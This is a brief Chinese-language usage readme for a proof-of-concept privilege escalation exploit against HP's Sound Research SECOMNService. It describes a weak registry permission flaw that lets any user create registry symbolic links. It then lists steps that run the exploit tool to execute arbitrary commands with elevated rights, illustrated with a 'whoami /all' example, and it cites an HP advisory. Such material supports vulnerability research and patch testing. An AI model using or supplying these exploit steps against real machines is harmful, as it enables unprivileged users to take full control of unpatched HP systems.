HP Sound Research SECOMNService 特权提升漏洞。注册表权限设置薄弱,允许任何用户创建注册表符号链接,并强制 SECOMNService 服务创建任意注册表项。
操作步骤:
1. soundresearch_poc.exe prepare
2. 重启 SECOMNService 或机器
3. soundresearch_poc.exe exploit "whoami /all > C:\Windows\soundresearch.txt"
4. soundresearch_poc.exe exploit "*another command*"
5. soundresearch_poc.exe cleanup
参考:https://support.hp.com/us-en/document/ish_13092608-13092602-16/hpsbhf04051